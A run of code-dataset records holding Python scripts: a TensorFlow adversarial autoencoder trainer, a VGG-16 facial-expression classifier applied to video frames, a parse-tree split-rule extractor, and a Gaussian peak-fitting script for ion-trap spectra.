self.batch_size)\n self.global_step += 1\n\n # Train AEN First\n _, summary, loss, recon_img = self.sess.run(\n [self.opt_r, self.summary, self.model.recon_loss, self.model.recon_img],\n feed_dict={self.model.batch_img: batch_img,\n self.model.prior_latent: prior_latent,\n self.model.keep_prob: self.param.keep_prob,\n self.model.label: batch_label,\n self.model.lr: self.lr\n })\n\n # Train D\n _, d_loss = self.sess.run(\n [self.opt_d, self.model.d_loss],\n feed_dict={self.model.batch_img: batch_img,\n self.model.prior_latent: prior_latent,\n self.model.keep_prob: 1.,\n self.model.label: batch_label,\n self.model.lr: self.lr\n })\n # Train G\n _, g_loss = self.sess.run(\n [self.opt_g, self.model.g_loss],\n feed_dict={self.model.batch_img: batch_img,\n self.model.keep_prob: 1.,\n self.model.label: batch_label,\n self.model.lr: self.lr\n })\n\n self.summary_writer.add_summary(summary=summary, global_step=self.global_step)\n\n tf.logging.info('{} epoch | {} iter;\\tRecon Loss:{}\\tD Loss:{}\\tG Loss:{}'.format(epoch, iter, loss, d_loss, g_loss))\n\n if self.param.save_img and np.mod(self.global_step, self.param.img_save_freq) == 0:\n save_images(recon_img,\n closest_divisor(recon_img.shape[0]),\n '{}/train_{}.png'.format(\n os.path.join(self.param.img_save_path, self.param.run_name), epoch))\n\n tf.logging.info('{} epoch finished;'.format(epoch))\n\n if self.global_step > int(0.8 * self.param.epoch * num_batch_per_epoch) and \\\n np.mod(epoch, self.param.model_save_freq) == 0:\n self.saver.save(self.sess, os.path.join(self.param.save_path, self.param.run_name) + '/',\n global_step=self.global_step)\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"499768314","text":"import os\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport glob\nimport cv2\nfrom sklearn.model_selection import train_test_split\nfrom keras.layers import Dropout, Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Sequential, load_model\nfrom keras.applications import VGG16\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nemotions = ['angry', 'disgust', 'fear', 'happy', 'neutral', 'sad', 'surprise']\nemotion_dfs = []\n\nfor cntr, emotion in enumerate(emotions) :\n\tfolder = '../../../expression_handling/expressions_db/images/train/' + emotion + '/'\n\tfiles = glob.glob(folder + '/*')\n\timg_names = [f.rsplit('/', maxsplit=1)[1] for f in files]\n\n\tno_files = len(files)\n\tdf = pd.DataFrame()\n\tdf[\"imageName\"] = img_names\n\tdf[\"folderName\"] = [folder] * no_files\n\tdf[\"Emotion\"] = [emotion] * no_files\n\tdf[\"Labels\"] = [cntr+1] * no_files\n\t#print('\\n\\n************************************************')\n\t#print(no_files)\n\t#print(df.head())\n\t#input('enter a key')\n\temotion_dfs.append(df)\n\nemotion_df_final = pd.concat(emotion_dfs)\nprint(emotion_df_final.shape)\n\nemotion_df_final.reset_index(inplace = True, drop = True)\nemotion_df_final = emotion_df_final.sample(frac = 1.0) #shuffling the dataframe\nemotion_df_final.reset_index(inplace = True, drop = True)\nprint(emotion_df_final.head())\n\ntrain_data, df_test = train_test_split(emotion_df_final, stratify=emotion_df_final[\"Labels\"], test_size = 0.197860)\ndf_train, df_cv = train_test_split(train_data, stratify=train_data[\"Labels\"], test_size = 0.166666)\nprint(df_train.shape, 
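latent_generator in the trainer record draws the adversarial prior from either a diagonal Gaussian or a 10-component Gaussian mixture (the TF1-era APIs such as tf.data.Iterator.from_structure date the record to TensorFlow 1.x). Outside the graph, the 'gaussian' branch amounts to:

import numpy as np

batch_size, z_dim = 64, 2
z = np.random.normal(loc=0.0, scale=1.0, size=(batch_size, z_dim))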
df_cv.shape, df_test.shape) # img_nm, folder_nm, emotion, lbl\n\ntrain_lbls = pd.get_dummies(df_train[\"Labels\"]).values\ntest_lbls = pd.get_dummies(df_test[\"Labels\"]).values\ncv_lbls = pd.get_dummies(df_cv[\"Labels\"]).values\nprint(train_lbls.shape, cv_lbls.shape, test_lbls.shape) # one hot encoded 7 lbls\nprint(train_lbls[0:10, :])\nprint(df_train.head())\n\ntrain_pointer = 0\ntest_pointer = 0\ncv_pointer = 0\n\ndef load_batch(bsz, df, labels, start_pointer) :\n\t#global train_pointer\n\tbatch_ims = []\n\tbatch_lbls = []\n\tfor i in range(bsz) :\n\t\tpath1 = df.iloc[start_pointer + i][\"folderName\"]\n\t\tpath2 = df.iloc[start_pointer + i][\"imageName\"]\n\t\timg = cv2.imread(os.path.join(path1, path2))\n\t\timg = cv2.resize(img, (48, 48))\n\t\timg = img / 255.0\n\t\tbatch_ims.append(img)\n\t\tbatch_lbls.append(labels[start_pointer + i])\n\tstart_pointer += i\n\treturn np.array(batch_ims), np.array(batch_lbls), start_pointer\n\n#creating bottleneck features for train data using VGG-16- Image-net model\nmodel = VGG16(weights='imagenet', include_top=False, input_shape=(48,48,3))\nmodel.summary()\ninput('enter a key...')\nSAVEDIR_train = \"data/bottleneck_features/train/\"\nSAVEDIR_LABELS_train = \"data/bottleneck_features/train_labels/\"\nSAVEDIR_cv = \"data/bottleneck_features/cv/\"\nSAVEDIR_LABELS_cv = \"data/bottleneck_features/cv_labels/\"\nSAVEDIR_test = \"data/bottleneck_features/test/\"\nSAVEDIR_LABELS_test = \"data/bottleneck_features/test_labels/\"\n\ndef handle_dset(df, labels, save_dir, savedir_lbls, start_pointer) :\n\tbatch_size = 10\n\tfor i in range(int(len(df)/batch_size)):\n\t\tx, y, start_pointer = load_batch(batch_size, df, labels, start_pointer)\n\n\t\tnp.save(os.path.join(savedir_lbls, \"bottleneck_labels_{}\".format(i+1)), y)\n\n\t\tbottleneck_features = model.predict(x)\n\t\tnp.save(os.path.join(save_dir, \"bottleneck_{}\".format(i+1)), bottleneck_features)\n\t\tif not i%100 :\n\t\t\tprint(\"Creating bottleneck features for batch {}\". 
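load_batch above advances its cursor with `start_pointer += i`, but the loop leaves i == bsz - 1, so every batch after the first re-reads the last image of the previous one and the cursor drifts by one per batch. The corrected tail of the function:

start_pointer += bsz   # not += i, which equals bsz - 1 after the loop
return np.array(batch_ims), np.array(batch_lbls), start_pointer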
format(i+1))\n\t\t\tprint(\"Bottleneck features for batch {} created and saved\".format(i+1))\n\nprint('\\n\\nTRAIN...................')\nhandle_dset(df_train, train_lbls, SAVEDIR_train, SAVEDIR_LABELS_train, train_pointer)\n\nprint('\\n\\nCV...................')\nhandle_dset(df_cv, cv_lbls, SAVEDIR_cv, SAVEDIR_LABELS_cv, cv_pointer)\n\nprint('\\n\\nTEST...................')\nhandle_dset(df_test, test_lbls, SAVEDIR_test, SAVEDIR_LABELS_test, test_pointer)\n\nno_of_classes = 7\ndef get_model(inp_shape) :\n\tmodel = Sequential()\n\n\tmodel.add(Dense(512, activation='relu', input_dim = inp_shape))\n\tmodel.add(Dropout(0.1))\n\n\tmodel.add(Dense(256, activation='relu'))\n\n\tmodel.add(Dense(128, activation='relu'))\n\tmodel.add(BatchNormalization())\n\n\tmodel.add(Dense(64, activation='relu'))\n\tmodel.add(Dense(no_of_classes, activation='softmax'))\n\n\treturn model\n\nSAVER = 'data/model_save'\ninput_shape = 1*1*512\nmodel = get_model(input_shape)\nmodel.summary()\nmodel.compile(loss = 'categorical_crossentropy', optimizer = \"adam\", metrics = [\"accuracy\"])\n\nepochs = 20\nbatch_size = 10\nstep = 0\ntrain_bottleneck_files = int(len(df_train) / batch_size)\ncv_bottleneck_files = int(len(df_cv) / batch_size)\nprint('\\n\\n\\n', train_bottleneck_files, cv_bottleneck_files)\ninput('enter a key...')\nepoch_number, train_loss, train_acc, cv_loss, cv_acc = [], [], [], [], []\n\nfor epoch in range(epochs):\n avg_epoch_tr_loss, avg_epoch_tr_acc, avg_epoch_cv_loss, avg_epoch_cv_acc = 0, 0, 0, 0\n epoch_number.append(epoch + 1)\n \n step = 0\n for i in range(train_bottleneck_files):\n \n step += 1\n \n #loading batch of train bottleneck features for training MLP.\n X_train_load = np.load(os.path.join(SAVEDIR_train, \"bottleneck_{}.npy\".format(i+1)))\n X_train = X_train_load.reshape(X_train_load.shape[0], X_train_load.shape[1]*X_train_load.shape[2]*X_train_load.shape[3])\n Y_train = np.load(os.path.join(SAVEDIR_LABELS_train, \"bottleneck_labels_{}.npy\".format(i+1)))\n \n #loading batch of CV bottleneck features for cross-validation.\n X_cv_load = np.load(os.path.join(SAVEDIR_cv, \"bottleneck_{}.npy\".format((i % cv_bottleneck_files) + 1)))\n X_cv = X_cv_load.reshape(X_cv_load.shape[0], X_cv_load.shape[1]*X_cv_load.shape[2]*X_cv_load.shape[3])\n Y_cv = np.load(os.path.join(SAVEDIR_LABELS_cv, \"bottleneck_labels_{}.npy\".format((i % cv_bottleneck_files) + 1)))\n \n train_Loss, train_Accuracy = model.train_on_batch(X_train, Y_train) #train the model on batch\n cv_Loss, cv_Accuracy = model.test_on_batch(X_cv, Y_cv) #cross validate the model on CV\n \n #print(\"Epoch: {}, Step: {}, Tr_Loss: {}, Tr_Acc: {}, cv_Loss: {}, cv_Acc: {}\".format(epoch+1, step, np.round(float(train_Loss), 2), np.round(float(train_Accuracy), 2), np.round(float(cv_Loss), 2), np.round(float(cv_Accuracy), 2)))\n \n avg_epoch_tr_loss += train_Loss / train_bottleneck_files\n avg_epoch_tr_acc += train_Accuracy / train_bottleneck_files\n avg_epoch_cv_loss += cv_Loss / train_bottleneck_files\n avg_epoch_cv_acc += cv_Accuracy / train_bottleneck_files\n \n print(\"Avg_train_Loss: {}, Avg_train_Acc: {}, Avg_cv_Loss: {}, Avg_cv_Acc: {}\".format(np.round(float(avg_epoch_tr_loss), 2), np.round(float(avg_epoch_tr_acc), 2), np.round(float(avg_epoch_cv_loss), 2), np.round(float(avg_epoch_cv_acc), 2)))\n\n train_loss.append(avg_epoch_tr_loss)\n train_acc.append(avg_epoch_tr_acc)\n cv_loss.append(avg_epoch_cv_loss)\n cv_acc.append(avg_epoch_cv_acc)\n \n model.save(os.path.join(SAVER, \"model_48_48.h5\")) #saving the model on each epoch\n 
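For 48x48 inputs, VGG-16 with include_top=False pools down to a 1x1x512 tensor (48 halves five times: 24, 12, 6, 3, 1), which is why input_shape is set to 1*1*512 for the MLP. The explicit per-dimension reshape in the loop is equivalent to:

X_train = X_train_load.reshape(X_train_load.shape[0], -1)   # (batch, 512)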
model.save_weights(os.path.join(SAVER, \"model_weights_48_48.h5\")) #saving the weights of model on each epoch\n print(\"Model and weights saved at epoch {}\".format(epoch + 1))\n \nlog_frame = pd.DataFrame(columns = [\"Epoch\", \"Train_Loss\", \"Train_Accuracy\", \"cv_Loss\", \"cv_Accuracy\"])\nlog_frame[\"Epoch\"] = epoch_number\nlog_frame[\"Train_Loss\"] = train_loss\nlog_frame[\"Train_Accuracy\"] = train_acc\nlog_frame[\"cv_Loss\"] = cv_loss\nlog_frame[\"cv_Accuracy\"] = cv_acc\nlog_frame.to_csv(\"data/logs/Log_48_48.csv\", index = False)\nprint(log_frame.head())\n#import sys\n#sys.exit(0)\n\nlog = pd.read_csv(\"data/logs/Log_48_48.csv\")\ndef plotting(epoch, train, cv, title, ylabel):\n fig, axes = plt.subplots(1,1, figsize = (12, 8))\n axes.plot(epoch, train, color = 'red', label = \"Train\")\n axes.plot(epoch, cv, color = 'blue', label = \"CV\")\n axes.set_title(title, fontsize = 25)\n axes.set_xlabel(\"Epochs\", fontsize = 20)\n axes.set_ylabel(ylabel, fontsize = 20)\n axes.grid()\n axes.legend(fontsize = 20)\n\nplotting(list(log[\"Epoch\"]), list(log[\"Train_Loss\"]), list(log[\"cv_Loss\"]), \"EPOCH VS LOSS\", 'Loss')\nplotting(list(log[\"Epoch\"]), list(log[\"Train_Accuracy\"]), list(log[\"cv_Accuracy\"]), \"EPOCH VS ACCURACY\", 'Accuracy')\n\nplt.show()\n\nEMOTION_DICT = {1:\"ANGRY\", 2:\"DISGUST\", 3:\"FEAR\", 4:\"HAPPY\", 5:\"NEUTRAL\", 6:\"SAD\", 7:\"SURPRISE\"}\nmodel_VGG = VGG16(weights='imagenet', include_top=False, input_shape=(48,48,3))\nmodel_top = load_model(\"data/model_save/model_48_48.h5\")\n\nfaceDet_one = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml\")\nfaceDet_two = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_alt2.xml\")\nfaceDet_three = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_alt.xml\")\nfaceDet_four = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_alt_tree.xml\")\n\ndef make_prediction(path):\n #converting image to gray scale and save it\n img = cv2.imread(path)\n #gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #cv2.imwrite(path, gray)\n \n #detect face in image, crop it then resize it then save it\n #face_cascade = cv2.CascadeClassifier('/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml') \n #img = cv2.imread(path)\n #gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n test_faces = []\n faces = faceDet_one.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n if not len(faces) :\n \tfaces = faceDet_two.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n \tif not len(faces) :\n \t\tfaces = faceDet_three.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n \t\tif not len(faces) :\n \t\t\tfaces = faceDet_four.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n print(\"{0} FACES DETECTED...\".format(len(faces)))\n for (x,y,w,h) in faces:\n face_clip = img[y:y+h, x:x+w, :]\n face_clip = cv2.resize(face_clip, (48, 48))\n test_faces.append(face_clip)\n \n #read the processed image then make prediction and display the result\n #read_image = cv2.imread(path)\n for img in test_faces :\n read_image = img.reshape(1, img.shape[0], img.shape[1], img.shape[2])\n read_image_final = read_image/255.0 #normalizing the image\n VGG_Pred = model_VGG.predict(read_image_final) #creating bottleneck features of image using VGG-16.\n VGG_Pred = VGG_Pred.reshape(1, VGG_Pred.shape[1]*VGG_Pred.shape[2]*VGG_Pred.shape[3])\n top_pred = 
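The nested not-found fallbacks across the four Haar cascades in make_prediction flatten into a loop over the detectors (a hedged equivalent of the record's chain):

faces = ()
for det in (faceDet_one, faceDet_two, faceDet_three, faceDet_four):
    faces = det.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5,
                                 minSize=(5, 5))
    if len(faces):
        break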
model_top.predict(VGG_Pred) #making prediction from our own model.\n emotion_label = top_pred[0].argmax() + 1\n print(\"\\n\\nPredicted Expression Probabilities\")\n print(\"ANGRY: {}\\nDISGUST: {}\\nFEAR: {}\\nHAPPY: {}\\nNEUTRAL: {}\\nSAD: {}\\nSURPRISE: {}\\n\".format(top_pred[0][0], top_pred[0][1], top_pred[0][2], top_pred[0][3], top_pred[0][4], top_pred[0][5], top_pred[0][6]))\n print(\"Dominant Probability = \"+str(EMOTION_DICT[emotion_label])+\": \"+str(max(top_pred[0])))\n print('**********************************************')\n cv2.imshow('face', img)\n cv2.waitKey(3000)\n\ndef FrameCapture(path):\n vidObj = cv2.VideoCapture(path)\n\n # Used as counter variable \n count = 0\n\n while True :\n\n # vidObj object calls read \n # function extract frames \n success, image = vidObj.read()\n if not success : break\n count += 1\n\n # Saves the frames with frame-count \n if not count%50 :\n \tcv2.imwrite(\"frame%d.jpg\" % count, image)\n \tmake_prediction(\"frame%d.jpg\" % count)\n\nFrameCapture('/home/vandana/cv_Project/temp/youtube/eating_icecream1.mp4')\n\n#make_prediction(\"../../../us.jpg\")\n\n","sub_path":"medium_mail/bottleneck_48_48.py","file_name":"bottleneck_48_48.py","file_ext":"py","file_size_in_byte":11890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"528557479","text":"# Local imports\nfrom semstruct import to_struct, to_struct_from_map\n\n# Global imports\nimport pickle\nfrom collections import defaultdict, Counter\nfrom nltk.tree import Tree\n#from _ast import List\n\nclass PrepSplitDict:\n \"\"\"Create the splitting dictionary from the prepped corpus dictionaries.\"\"\"\n \n def __init__(self, prepped_path, tar_path):\n # Initialize split dictionaries\n self.split_dict_unary = defaultdict(Counter)\n self.split_dict_bin = {mode:defaultdict(Counter)\n for mode in ['no','lr','l','r']}\n \n # Fill split dictionaries\n self.process_corpus_dicts(prepped_path)\n \n # Save split dictionaries\n self.save_split_dict(self.split_dict_unary, tar_path+'/sd_unary.pickle')\n self.save_split_dict(self.split_dict_bin, tar_path+'/sd_binary.pickle')\n \n def process_corpus_dicts(self, prepped_path):\n \"\"\"Read the corpus part dicts and add them to the split dictionary.\"\"\"\n # Iterate over all corpus parts\n for p in range(1): # TODO: change to range(100) to iterate all parts\n print('Processing part {0:02d}..'.format(p))\n # Read the prepped dictionaries for this part\n cm_file = open('{0}/p{1:02d}_cm_dict.pickle'.format(prepped_path, p), 'rb')\n cm_dict = pickle.load(cm_file)\n cm_file.close()\n st_file = open('{0}/p{1:02d}_st_dict.pickle'.format(prepped_path, p), 'rb')\n st_dict = pickle.load(st_file)\n st_file.close()\n # Add to split dict the split rules of each sentence\n print(cm_dict)\n for i in range(len(st_dict)):\n st = st_dict[i]\n cm = cm_dict[i]\n print(i)\n print(cm)\n cm_dict_single = self.create_core_meaning_dict(st, cm)\n self.get_split_rules(st, tuple(), cm_dict_single)\n print('Total unary rules:\\t{}'.format(len(self.split_dict_unary)))\n print('Total bin_lr rules:\\t{}'.format(len(self.split_dict_bin['lr'])))\n print('Total bin_l rules:\\t{}'.format(len(self.split_dict_bin['l'])))\n print('Total bin_r rules:\\t{}'.format(len(self.split_dict_bin['r'])))\n print('Total bin rules:\\t{}'.format(len(self.split_dict_bin['no'])))\n \n def get_split_rules(self, subtree, pos, cm_dict):\n \"\"\"Get the split rules for one sentence.\"\"\"\n # The input must be a tree with children that are also trees\n if not 
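The split dictionaries in the grammar record rely on defaultdict(Counter), so an unseen parent structure gets an empty counter on first touch and rule counts accumulate without any key checks; the idiom in isolation:

from collections import Counter, defaultdict

split_counts = defaultdict(Counter)
split_counts['S'][('NP', 'VP')] += 1     # no KeyError on first access
split_counts['S'][('NP', 'VP')] += 1
print(split_counts['S'].most_common(1))  # [(('NP', 'VP'), 2)]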
(isinstance(subtree, Tree) and isinstance(subtree[0], Tree)):\n return\n \n # If the input tree has one child, extract a unary split rule \n if len(subtree) == 1:\n self.get_split_rule_unary(subtree.label(), subtree[0].label())\n # Else if the input tree has two children, extract a binary split rule\n elif len(subtree) == 2:\n cm_l = True if pos+(0,) in cm_dict else False\n cm_r = True if pos+(1,) in cm_dict else False\n self.get_split_rule_binary(subtree.label(), subtree[0].label(),\n subtree[1].label(), cm_l, cm_r)\n else:\n print('WARNING: Encountered a rule thats not unary or binary.')\n # Recursively get split rules for the child node subtrees\n for i in range(len(subtree)):\n self.get_split_rules(subtree[i], pos+(i,), cm_dict)\n\n def get_split_rule_unary(self, parent, child):\n \"\"\"Get the split rule for a unary node in the tree.\"\"\"\n parent_struct, mapping = to_struct(parent)\n child_struct = to_struct_from_map(child, mapping)\n \n self.split_dict_unary[parent_struct][child_struct] += 1\n\n def get_split_rule_binary(self, parent, left, right, cm_l, cm_r):\n \"\"\"Get the split rule for a binary node in the tree.\"\"\"\n parent_struct, mapping = to_struct(parent)\n left_struct = to_struct_from_map(left, mapping)\n right_struct = to_struct_from_map(right, mapping)\n if cm_l and cm_r:\n self.split_dict_bin['lr'][parent_struct][(left_struct, right_struct)] += 1\n elif cm_l:\n self.split_dict_bin['l'][parent_struct][(left_struct, right_struct)] += 1\n elif cm_r:\n self.split_dict_bin['r'][parent_struct][(left_struct, right_struct)] += 1\n else:\n self.split_dict_bin['no'][parent_struct][(left_struct, right_struct)] += 1\n\n def save_split_dict(self, split_dict, tar_path):\n \"\"\"Save the split dictionary to a file.\"\"\"\n split_file = open(tar_path, 'wb')\n pickle.dump(split_dict, split_file)\n split_file.close()\n \n def create_core_meaning_dict(self, tree, core_meanings):\n \"\"\"Find for every node the list of the core meanings of its descendants.\"\"\"\n core_meaning_dict = defaultdict(list)\n index = 0\n # Loop over all nodes of the tree\n for pos in tree.treepositions():\n subtree = tree[pos]\n # If the node is a leaf node with a core meaning, assign to ancestors\n if isinstance(subtree, str):\n index += 1\n if index in core_meanings:\n #core_meaning = core_meanings[index]\n for i in range(len(pos)+1):\n anc_pos = pos[:i]\n core_meaning_dict[anc_pos].append(index)\n \n return core_meaning_dict\n \nPrepSplitDict('data/gmb-prepped', 'data/split-dicts')","sub_path":"prep_split_dict.py","file_name":"prep_split_dict.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440681424","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 9 13:18:20 2019\r\n\r\n@author: msmith\r\n\r\nEdit Log:\r\n-------------------------------------------------------------------------------\r\n\r\n\r\n-------------------------------------------------------------------------------\r\n\r\n\r\n\r\nUser Notes:\r\n-------------------------------------------------------------------------------\r\n-Code depend on a '####.#-####.#V' format in the TXT file name as described below:\r\n -The voltage trap values used in a text file be displated in the file name under the\r\n format of the voltages being displayed in the thousands and to a sigle decimal precision\r\n seperated by a dash or space, followed by a capital V, no spaces.\r\n -Example: '1234.5-3456.7V' and '0245.0 0255.5V' Bad:'1234.5-3456.7 V' or 
'345-123.4V'\r\n \r\n    -That there be NO OTHER characters using a capital V in that file name\r\n        -Example: Good: 'Example_File_1234.5-3456.7V' and '1234.5-3456.7V Good Name' \r\n                 Bad: 'Example_Voltage_txt_1234.5-3456.7V' and 'V great data file 1234-3456V'\r\n        \r\n-The txt reader skips the first 18 lines, because these are usually text,\r\n    not data. One can remove this behaviour by commenting out the specified line\r\n    within the \"GetData\" function\r\n\r\n-The gaussian will only fit to the highest peak in the spectrum \r\n    \r\n-This code is written assuming 1 peak is to be analyzed per file\r\n\r\n-Negative count numbers caused by gaussian fit overestimation are treated as \r\n    zeroes\r\n\r\n-Data is not normalized, but could be if you so wished by uncommenting the 4th line\r\n    after the for loop begins in the Main fn\r\n-------------------------------------------------------------------------------\r\n\r\n\r\n\"\"\"\r\n# imports\r\nimport numpy\r\nimport os\r\nimport math\r\nfrom scipy.optimize import curve_fit\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# Check how many counts are in a peak's left and right tails, and print those values to a txt file that can be read into Excel for graphing\r\n\r\n\r\n\r\n# =============================================================================\r\n# Function definitions\r\n# =============================================================================\r\n\r\n\r\n#---------------------------------GetFiles-------------------------------------\r\n# this function takes 'path', the path to the folder, and returns a list of all the txt files within\r\n\r\ndef GetFiles(path):\r\n    files = []\r\n    for r, d, f in os.walk(path):# r=root, d=directories, f = files\r\n        for file in f:\r\n            if '.txt' in file:\r\n                files.append(os.path.join(r, file))\r\n    return files\r\n    \r\n#----------------------------------GetData-------------------------------------\r\n# this function takes a txt file path, reads all data PAST THE 18th LINE and returns the first and second columns as xData and yData respectively\r\n \r\ndef GetData(filePath):\r\n    with open(filePath, newline = '') as file:\r\n        data_reader = csv.reader(file, delimiter='\\t')\r\n        data = [line for line in data_reader]\r\n        #line to comment out\r\n        data = data[18:] # the first 18 lines are usually text and not the data\r\n        xData = [i[0] for i in data]\r\n        yData = [i[1] for i in data]\r\n        xData = [float(i) for i in xData]\r\n        yData = [float(i) for i in yData]\r\n        errorBars = numpy.asarray([math.sqrt(i+1) for i in yData])# also assigns an error of yVal+1 should you need that\r\n    return [xData,yData,errorBars]\r\n\r\n#----------------------------DataTruncation-------------------------------------\r\n#truncate the data around the central peak for some radius along the x axis\r\ndef DataTruncation(xData,yData,radius):\r\n    info=GetMaxInfo(xData,yData)\r\n    yMaxIndex=info[1]\r\n    newxData=[]\r\n    newyData=[]\r\n    for counter,x in enumerate(xData):\r\n        if abs(x-xData[yMaxIndex])<radius:\r\n            newxData.append(x)\r\n            newyData.append(yData[counter])\r\n    return [newxData,newyData]\r\n\r\n#-----------------------------GetMaxInfo---------------------------------------\r\n# returns [x location of the maximum y value, index of that maximum in xData/yData]\r\ndef GetMaxInfo(xData,yData):\r\n    yMaxIndex=yData.index(max(yData))\r\n    return [xData[yMaxIndex],yMaxIndex]\r\n\r\n#------------------------------Gaussfunc---------------------------------------\r\n# gaussian used by curve_fit, parameter syntax is [centre,sigma,amplitude]\r\ndef Gaussfunc(x,centre,sigma,amplitude):\r\n    return amplitude*numpy.exp(-(numpy.asarray(x)-centre)**2/(2*sigma**2))\r\n\r\n#------------------------------ReimannSum--------------------------------------\r\n# rectangular integral of the data\r\ndef ReimannSum(xData,yData):\r\n    total=0\r\n    for i in range(len(xData)-1):\r\n        total+=yData[i]*(xData[i+1]-xData[i])\r\n    return total\r\n\r\n#------------------------------Normalized--------------------------------------\r\n# scale the counts so the data integrates to one\r\ndef Normalized(xData,yData):\r\n    total=ReimannSum(xData,yData)\r\n    return [y/total for y in yData]\r\n\r\n#--------------------------------LogPlot---------------------------------------\r\n# plot the data on a log y axis, and show the figure when show is true\r\ndef LogPlot(xData,yData,style,label,show):\r\n    plt.semilogy(xData,yData,style,label=label)\r\n    if show:\r\n        plt.legend()\r\n        plt.show()\r\n\r\n#----------------------------SubtractGaussian----------------------------------\r\n# subtract the fitted gaussian from the data\r\ndef SubtractGaussian(yData,gaussianFit):\r\n    return [y-g for y,g in zip(yData,gaussianFit)]\r\n\r\n#-----------------------------SubtractFWHM-------------------------------------\r\n# zero the counts within one FWHM of the peak and keep everything outside it\r\ndef SubtractFWHM(xData,yData,sigma,maxIndex):\r\n    FWHM=2.355*sigma\r\n    newyData=[]\r\n    for counter,x in enumerate(xData):\r\n        if abs(x-xData[maxIndex])>(FWHM/2):\r\n            newyData.append(yData[counter])\r\n        else:\r\n            newyData.append(0)\r\n    return newyData\r\n#----------------------------RemoveNegatives-----------------------------------\r\n# all negative values are converted to zeroes\r\n\r\ndef RemoveNegatives(yData):\r\n    copy=[]\r\n    for y in yData:\r\n        if y<0:\r\n            copy.append(0)\r\n        else:\r\n            copy.append(y)\r\n    return copy\r\n\r\n#-------------------------------OrderFiles-------------------------------------\r\n# this function is used if you want to order the files by adding their index to the last 
character of the TXT file name\r\n# example 'txtFile_0.txt' 'txtFile_1.txt'.....\r\n\r\ndef OrderFiles(files):\r\n orderedFiles=[]\r\n indexTracker=[]\r\n for currentIndex,file in enumerate(files):\r\n try:\r\n properIndex=int(file[-6:-4])-1\r\n indexTracker.append(properIndex)\r\n except:\r\n properIndex=int(file[-5])-1\r\n indexTracker.append(properIndex)\r\n for x in range(len(files)):\r\n for idx in indexTracker:\r\n if x==idx:\r\n orderedFiles.append(files[indexTracker.index(idx)])\r\n return orderedFiles\r\n\r\n#-------------------------------SortList--------------------------------------\r\n#sort a list based of ascending order of values a second reference list that is not inherently in ascending order\r\n#assumes Max vakue in the referece list is <100000\r\n#Both list must be the same length, and reference list CANNOT have repeat values\r\n#both lists indecies should be coupled. ie value[4] in list1 corresponds to value[4] in list 2 \r\n \r\ndef SortLists(listToBeSorted, referenceList): \r\n copyReferenceList=referenceList[:]# so that the reference list isnt mutated\r\n sortedList=[]\r\n sortedReferenceList=[]\r\n counter=len(referenceList)# so that we loop through all values in list\r\n while counter>0:\r\n #getting index of min value \r\n minVal=min(copyReferenceList)\r\n minIndex=copyReferenceList.index(minVal)\r\n #assigning that min value in to the new lists\r\n sortedReferenceList.append(minVal)\r\n sortedList.append(listToBeSorted[minIndex])\r\n \r\n #replace the min value with a high number so it does not get counted again\r\n copyReferenceList[minIndex]=100000\r\n counter-=1\r\n return [sortedList,sortedReferenceList]\r\n\r\n#---------------------------GetTurnNumber--------------------------------------\r\n#This gets the number of turns, it is dependent of T### format followed\r\ndef GetTurnNumber(file):\r\n file=file[-55:]\r\n indexT=file.find('T')\r\n turnNumber=int(file[indexT+1:indexT+4])\r\n return turnNumber\r\n\r\n#----------------------GetTrapVoltageSymmerty----------------------------------\r\n#Gets the trap voltage following the format of the voltages being names as followed:\r\n#File name is: \"example-1234.5-1235.5V.txt\", ie the two voltages seperated by a dash\r\n#with a capital V directly afterwards\r\n# can be no other V characters in filename\r\ndef GetTrapVoltlageSymmerty(file):\r\n file=file[-55:]\r\n indexV=file.find('V')\r\n higherVoltage=float(file[indexV-13:indexV-7])\r\n lowerVoltage=float(file[indexV-6:indexV])\r\n difference=lowerVoltage-higherVoltage\r\n return difference\r\n\r\n#---------------------GetFileNameResolvingPower--------------------------------\r\n# this is not currently in use\r\n#This gets the resolving powwer from the txt file name:\r\n#File name is: \"example-1234.5-1235.5V 310k.txt\", ie the 3 didget resolving power folowed by a 'k'\r\n# can be no other 'k' characters in the file name\r\ndef GetFileNameResolvingPower(file):\r\n file=file[-55:]\r\n indexk=file.find('k')\r\n resolvingPower=file[indexk-3:indexk]\r\n return resolvingPower\r\n\r\n#---------------------------GetResolvingPower----------------------------------\r\n#rounds value to the thousands and makes it a string with a k at the end\r\n# assumes the reolving power is greater then 100k\r\n \r\ndef GetResolvingPower(centre,sigma):\r\n resolvingPower=centre/(sigma*2.355)\r\n resolvingPower=int(resolvingPower/1000)\r\n resolvingPower=str(resolvingPower)+' k'\r\n return resolvingPower\r\n# =============================================================================\r\n# 
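GetTurnNumber and GetTrapVoltlageSymmerty above slice fixed character offsets around 'T' and 'V'. For illustration only (this regex version is not part of the original script), the same '####.#-####.#V' and 'T###' conventions can be expressed as regular expressions, which fail loudly instead of silently mis-slicing:

```python
import re

# Hypothetical regex equivalents of the slicing parsers above.
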